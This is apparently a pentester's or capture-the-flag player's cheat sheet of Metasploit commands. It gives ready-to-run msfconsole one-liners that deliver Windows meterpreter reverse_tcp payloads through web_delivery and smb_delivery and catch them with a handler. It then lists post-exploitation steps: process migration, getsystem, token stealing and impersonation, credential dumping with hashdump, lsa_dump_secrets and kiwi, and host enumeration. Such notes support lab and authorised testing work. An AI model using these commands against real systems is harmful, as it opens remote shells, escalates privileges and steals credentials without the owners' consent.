Metasploit
Check [[shells]] for building meterpreter payloads with msfvenom
# Install exploit manually
cp -v <EXPLOIT> /usr/share/metasploit-framework/modules/exploits/
# OR from exploit-db
pushd /usr/share/metasploit-framework/modules/exploits/
searchsploit -m <EDB-ID>
# in MSF
reload
reload_all
### Search
# <type>/<os>/<service>/<name>
# Search for port and name, showing exploits only
search type:exploit platform: port:<PORT> name:<NAME>
# grep
grep meterpreter grep reverse_tcp show payloads
# Set all LHOST to tunnel IP
setg LHOST tun0🌐 Meterpreter via WEB_DELIVERY
sudo msfconsole -q -x "use exploit/multi/script/web_delivery; set target PSH; set payload windows/x64/meterpreter/reverse_tcp; set SRVHOST tun0; set LHOST tun0; set LPORT 50000; exploit"Use provided PowerShell command!
📦 Meterpreter via SMB_DELIVERY
sudo msfconsole -q -x "use exploit/windows/smb/smb_delivery; set payload windows/x64/meterpreter/reverse_tcp; set SRVHOST tun0; set LHOST tun0; set LPORT 50000; exploit"Use provided rundll32.exe command!
🎧 Multi/Handler (Windows reverse_tcp)
sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 50000; exploit"📊 Meterpreter Survey
sysinfo
getuid
getpid
ipconfig
ps
# Linux flag search
search -d / -f flag.txt
search -d / -f user.txt
search -d / -f root.txt
# Windows flag search
search -d C:\\ -f flag.txt
search -d C:\\ -f user.txt
search -d C:\\ -f root.txt
# REMEMBER: for Windows, quoting and double slashes
cat "C:\\Programs and Files (x86)\\"
# Migrate
ps -s | grep svchost
migrate <PID>
getsystem
getprivs
# List security tokens of user and group
list_tokens -u
list_tokens -g
impersonate_token <DOMAIN_NAMEUSERNAME>
steal_token <PID>
drop_token
# Dumps creds
hashdump # CrackStation
lsa_dump_sam
lsa_dump_secrets
# Better dump creds
load kiwi
creds_all
# === WINDOWS ===
run winenum
run post/windows/gather/checkvm
run post/windows/gather/enum_applications
run post/windows/gather/enum_logged_on_users
run post/windows/gather/enum_shares
# --- Privilege Escalation & Credential Gathering ---
run post/windows/gather/smart_hashdump
run post/multi/recon/local_exploit_suggester🗄️ DB for Targets
# for db_* commands
sudo service postgresql start
sudo msfdb init
sudo msfconsole -q# Check database status from within msfconsole
db_status
# Database Backend Commands
db_nmap <NMAP_OPTS> <TARGET>
db_connect
db_disconnect
db_export -f xml metasploit_backup.xml
db_import <SCAN_FILE_XML>
db_rebuild_cache
db_remove
db_save
# Manage workspaces
workspace
workspace -a <WORKSPACE>
workspace -d <WORKSPACE>
workspace <WORKSPACE>
hosts
loot
notes
services
vulns
creds
# Using database hosts for a module
hosts -R # set RHOSTS from hosts
services -S <SEARCH>